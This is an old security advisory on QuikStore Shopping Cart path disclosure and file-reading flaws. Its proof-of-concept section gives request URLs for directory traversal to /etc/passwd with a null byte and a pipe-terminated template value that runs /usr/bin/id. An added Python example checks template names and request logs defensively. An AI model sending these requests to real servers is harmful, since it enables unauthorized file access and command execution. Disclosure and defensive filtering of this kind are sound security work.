`Indonesia Security Development Team Advisory
QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
=====================================================================
Advisory Name: QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
Release Date: 5:08 23/12/03
Application: QuikStore Shopping Cart
Author: Dr`Ponidi <[email protected]>
Discovered by: Dr`Ponidi <[email protected]>
Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
Vendor Status: The vendor has been contacted
Vendor URL: http://www.quikstore.com
Reference: http://drponidi.5u.com/advisory.htm
Greetz to: #indohack #k-elektronik #dhegleng @ dal.net
[Details]
A remote user can reportedly send a request that causes the system
to display an error message that indicates the installation path.
It is possible to make a malformed HTTP request for many files in
QuikStore Shopping Cart and in doing so trigger an error.
The resulting error message will disclose potentially sensitive installation
path information to the remote attacker. QuikStore Shopping Cart also allows remote
file reading: users can view files on the system with the privileges of the web server.
[Proof of Concept]
http://[target]/cgi-bin/quikstore.cgi?store='
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id|
[Suggestions]
Filter all files
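One way to apply this suggestion to the template parameter, shown as an added example that is not QuikStore's code and not part of the original advisory. The template root, the ".html" allow-list policy, the host shop.example and the function names are assumptions; symbolic links inside the template directory are not handled.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

TEMPLATE_ROOT = "/var/www/quikstore/templates"  # hypothetical install path
# Assumed policy: letters, digits, '.', '_', '-', '/' only, ending in ".html".
# This excludes '|' and every other shell or open-mode character.
ALLOWED = re.compile(r"[A-Za-z0-9._/-]+\.html")


def resolve_template(name, root=TEMPLATE_ROOT):
    """Map a requested template name to a path under root, or raise ValueError."""
    if "\x00" in name:  # "%00" decodes to NUL, which truncates C-level paths
        raise ValueError("NUL byte")
    if not ALLOWED.fullmatch(name):
        raise ValueError("disallowed name")
    path = posixpath.normpath(posixpath.join(root, name))
    # "../" is collapsed above; now require the result to stay inside root.
    if posixpath.commonpath([root, path]) != root:
        raise ValueError("outside template root")
    return path


def audit_request(url):
    """Return 'ok' or the rejection reason for a request's template parameter."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for value in params.get("template", []):
        try:
            resolve_template(value)
        except ValueError as exc:
            return str(exc)
    return "ok"


# Constructed requests modelled on the advisory's proof-of-concept URLs.
BASE = "http://shop.example/quikstore.cgi?category=blah&template="
SAMPLES = [
    BASE + "products.html",
    BASE + "../../../../etc/passwd%00.html",
    BASE + "../../../../etc/hosts",
    BASE + "../../../../usr/bin/id|",
    BASE + "../../../../etc/motd.html",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(audit_request(url), url)
```

The same audit_request function can be run over the request URLs in a web server access log to flag earlier attempts against the template parameter.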
[Patch:]
Not yet available
[About Indonesia Security Development Team]
Indonesia Security Development Team researches and develops
intelligent, advanced application security assessment. Based in
Indonesia, Indonesia Security Development Team offers the best of
breed security consulting services, specializing in shopping carts
software and network security assessments. We provide security
information and patches for use by the entire network security community.
This information is provided freely to all interested parties and may
be redistributed provided that it is not altered in any way, and that
the author is appropriately credited.
Indonesia Security Development Team Advisory:
http://drponidi.5u.com/advisory.htm
_______________________________________________________________
Dr`Ponidi <[email protected]>
Original document can be found at http://drponidi.5u.com/advisory.htm
--
`